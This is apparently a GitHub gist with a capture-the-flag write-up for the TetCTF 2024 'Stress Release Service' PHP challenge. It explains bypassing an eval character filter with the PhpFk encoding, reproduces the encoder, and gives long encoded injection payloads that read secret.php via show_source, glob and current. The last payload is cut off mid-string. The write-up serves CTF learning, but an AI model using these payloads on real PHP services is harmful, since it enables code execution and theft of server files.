Skip to content

Instantly share code, notes, and snippets.

@ky28059

ky28059/TetCTF 2024 Stress Release Service writeup.md

Last active May 20, 2024 13:11
Show Gist options
  • Save ky28059/9822d07004862c228a90ca0da00166b6 to your computer and use it in GitHub Desktop.
Save ky28059/9822d07004862c228a90ca0da00166b6 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
TetCTF 2024 Stress Release Service writeup.md

TetCTF 2024 — Stress Release Service

For a better New Year, we are introducing a service that can help you reduce stress: http://192.53.173.71:8080 . As our service is only available during the New Year, we are also providing you with a code for later use in material section.

We are given a PHP server that looks like this:

<br><center>
<font size=5 color=red >STRESS RELEASE SERVICE</font>
<br><br><br>
To relieve all your stress from the old year, all you need is SHOUTTTTTT!!!!
<br><br><br>
<form action="/" method="GET">
    <input type="submit" value="shout"/><input type="text" name="shout" value="@!@!@!@!@!@!@!@!" />
</form>
</center>

<?php

function validateInput($input) {
    // To make your shout effective, it shouldn't contain alphabets or numbers.
    $pattern = '/[a-z0-9]/i';
    if (preg_match($pattern, $input)) {
        return false;
    } 

    // and only a few characters. Let's make your shout clean.
    $count = count(array_count_values(str_split($input)));
    if ($count > 7) {
        return false;
    }

    return true;
}

if (isset($_GET["shout"]) && !empty($_GET["shout"]) && is_string($_GET["shout"])) {
    $voice = $_GET["shout"];
    $res = "<center><br><br><img src=\"https://i.imgur.com/SvbbT0W.png\" width=5% /> WRONGGGGG WAYYYYYY TOOOO RELEASEEEEE STRESSSSSSSS!!!!!!</center>";
    if(validateInput($voice) === true) {
        eval("\$res='<center><br><br><img src=\"https://i.imgur.com/TL6siVW.png\" width=5% /> ".$voice.".</center>';");
    }

    if (strlen($res) < 300) {
        echo $res;
    } else {
        echo "<center>Too loud!!! Please respect your neighbor.</center>";
    }
} 

?>

with the flag stored in a variable in secret.php.

We can pass arbitrary input to $_GET["shout"], but our input is only eval'ed if it passes validateInput():

function validateInput($input) {
    // To make your shout effective, it shouldn't contain alphabets or numbers.
    $pattern = '/[a-z0-9]/i';
    if (preg_match($pattern, $input)) {
        return false;
    } 

    // and only a few characters. Let's make your shout clean.
    $count = count(array_count_values(str_split($input)));
    if ($count > 7) {
        return false;
    }

    return true;
}

so our payload

  1. cannot contain alphanumeric characters
  2. cannot contain more than 7 unique characters.

Furthermore, the payload is wrapped in a single-quoted string when eval'ed that we need to escape using

'.{payload}.'

At first glance, it looks like we can use PHPFuck to run arbitrary PHP with only 7 unique, non-alphanumeric characters (([+.^])). Unfortunately, PHPFuck is broken on PHP versions > 7.0.x, and the need to use a single quote to run the payload would bring the total unique characters to 8.

Another alternative, phpfuck, uses only 5 characters but requires alphanumeric input (^.9).

Instead, we can use PhpFk, which works on PHP 8 with 6 characters: (,.^'). Importantly, this set of characters also includes . and ', the two characters we need to run our payload!

We can then encode arbitrary PHP strings with

const INITIAL_CHAR_MAP = [
    '(' => "'('",
    ')' => "')'",
    '*' => "('.'^','^'(')",
    '+' => "(')'^'.'^',')",
    ',' => "','",
    '-' => "(')'^','^'(')",
    '.' => "'.'",
    '/' => "(')'^'.'^'(')",
    'X' => "('^'^'.'^'(')",
    'Y' => "(')'^'^'^'.')",
    'Z' => "('^'^','^'(')",
    '[' => "(')'^'^'^',')",
    '\\' => "('^'^'.'^',')",
    ']' => "(')'^'^'^'.'^','^'(')",
    '^' => "'^'",
    '_' => "(')'^'^'^'(')",
    'p' => "('^'^'.')",
    'q' => "(')'^'^'^'.'^'(')",
    'r' => "('^'^',')",
    's' => "(')'^'^'^','^'(')",
    't' => "('^'^'.'^','^'(')",
    'u' => "(')'^'^'^'.'^',')",
    'v' => "('^'^'(')",
    'w' => "(')'^'^')",
];

const STRSTR = '(' . INITIAL_CHAR_MAP['s'] . '.' . INITIAL_CHAR_MAP['t'] . '.' . INITIAL_CHAR_MAP['r'] . '.' . INITIAL_CHAR_MAP['s'] . '.' . INITIAL_CHAR_MAP['t'] . '.' . INITIAL_CHAR_MAP['r'] . ')';
const SQRT = '(' . INITIAL_CHAR_MAP['s'] . '.' . INITIAL_CHAR_MAP['q'] . '.' . INITIAL_CHAR_MAP['r'] . '.' . INITIAL_CHAR_MAP['t'] . ')';
const _FALSE = STRSTR . "('','.')";
const ZERO_INT = SQRT . '(' . _FALSE . ')';
const ZERO_CHAR = '(' . ZERO_INT . ".'')";

const CHAR_MAP = INITIAL_CHAR_MAP + [
        '0' => ZERO_CHAR,
        '1' => '(' . ZERO_CHAR . "^')'^'(')",
        '2' => '(' . ZERO_CHAR . "^'.'^',')",
        '3' => '(' . ZERO_CHAR . "^')'^'.'^','^'(')",
        '4' => '(' . ZERO_CHAR . "^','^'(')",
        '5' => '(' . ZERO_CHAR . "^')'^',')",
        '6' => '(' . ZERO_CHAR . "^'.'^'(')",
        '7' => '(' . ZERO_CHAR . "^')'^'.')",
        '@' => '(' . ZERO_CHAR . "^'^'^'.')",
        'A' => '(' . ZERO_CHAR . "^')'^'^'^'.'^'(')",
        'B' => '(' . ZERO_CHAR . "^'^'^',')",
        'C' => '(' . ZERO_CHAR . "^')'^'^'^','^'(')",
        'D' => '(' . ZERO_CHAR . "^'^'^'.'^','^'(')",
        'E' => '(' . ZERO_CHAR . "^')'^'^'^'.'^',')",
        'F' => '(' . ZERO_CHAR . "^'^'^'(')",
        'G' => '(' . ZERO_CHAR . "^')'^'^')",
        'h' => '(' . ZERO_CHAR . "^'^'^'.'^'(')",
        'i' => '(' . ZERO_CHAR . "^')'^'^'^'.')",
        'j' => '(' . ZERO_CHAR . "^'^'^','^'(')",
        'k' => '(' . ZERO_CHAR . "^')'^'^'^',')",
        'l' => '(' . ZERO_CHAR . "^'^'^'.'^',')",
        'm' => '(' . ZERO_CHAR . "^')'^'^'^'.'^','^'(')",
        'n' => '(' . ZERO_CHAR . "^'^')",
        'o' => '(' . ZERO_CHAR . "^')'^'^'^'(')",
    ];

function obfuscateString(string $str): string
{
    return '' === $str ? "''" : join(
        '.',
        array_map(
            fn($char) => sprintf('(%s)',
                CHAR_MAP[$char]
                ?? sprintf('((%s).(%s).(%s))(%s)',
                CHAR_MAP['C'],
                CHAR_MAP['h'],
                CHAR_MAP['r'],
                obfuscatePositiveInteger(ord($char))
            )
            ),
            str_split($str)
        )
    );
}

function obfuscatePositiveInteger(int $nb): string
{
    assert($nb >= 0);
    return match ($nb) {
        0, 1, 2, 3, 4, 5, 6, 7 => CHAR_MAP[$nb],
        8, 9 => sprintf('((%s).(%s).(%s).(%s).(%s).(%s))(%s)',
            CHAR_MAP['o'], CHAR_MAP['C'], CHAR_MAP['t'], CHAR_MAP['D'], CHAR_MAP['E'], CHAR_MAP['C'],
            join('.', array_map(
                    fn($digit) => sprintf('(%s)', CHAR_MAP[$digit]),
                    str_split(decoct($nb)))
            )
        ),
        default => sprintf('(%s)', join(').(', array_map(__FUNCTION__, str_split("$nb")))),
    };
}
PhpFk.php L23-116

The main idea is that you can call functions in PHP from their string names. If we can inject something like

"join"("file"("secret.php"))

or

"show_source"("secret.php")

we can cat the flag file and get the flag.

The problem is that the PhpFk encoding is incredibly verbose — some letters can take as many as 2000 characters to encode. Furthermore, Apache has a default maximum request length of 8190 bytes. Because of URL encoding (ex. (%28), our actual maximum payload size is closer to 8190 / 3 = 2730 characters.

Our first problem is that encoding "secret.php" gives

((')'^'^'^','^'(')).(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(('^'^',')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')))).(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(('^'^',')))((((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(('^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')))).(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(('^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')))))).(('^'^',')).(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(('^'^',')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')))).(('^'^'.'^','^'(')).('.').(('^'^'.')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(('^'^'.'))

— 5296 characters long.

Instead, we can use glob("s*") to get ["secret.php"], then extract the first element of the array using current to get the filename.

Encoding "glob", however, would require 4453 characters, negating all of our savings:

(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(('^'^',')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'.'^','^'(')))).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(('^'^',')))((((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(('^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')))).(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(('^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).''))))))

Luckily, PHP function calling is case insensitive: "glob"(...) and "gLoB"(...) refer to the same function! Through some trial and error, we can encode "GloB" in only 751 characters,

(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^','))

"CurrEnt" in 633 characters,

(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).((')'^'^'^'.'^',')).(('^'^',')).(('^'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^')).(('^'^'.'^','^'('))

and "s*" in 35:

((')'^'^'^','^'(')).(('.'^','^'('))

"secret.php" can then be encoded in 1427 characters as

("CurrEnt")(("GloB")("s*"))
((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).((')'^'^'^'.'^',')).(('^'^',')).(('^'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^')).(('^'^'.'^','^'(')))(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^',')))(((')'^'^'^','^'(')).(('.'^','^'('))))

Then, encoding "show_sourCE" (1057 characters) as

((')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).((')'^'^')).((')'^'^'^'(')).((')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).((')'^'^'^'.'^',')).(('^'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^','))

we get out final payload:

'.("show_sourCE")(("CurrEnt")(("GloB")("s*"))).'
'.(((')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).((')'^'^')).((')'^'^'^'(')).((')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).((')'^'^'^'.'^',')).(('^'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')))(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).((')'^'^'^'.'^',')).(('^'^',')).(('^'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^')).(('^'^'.'^','^'(')))(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(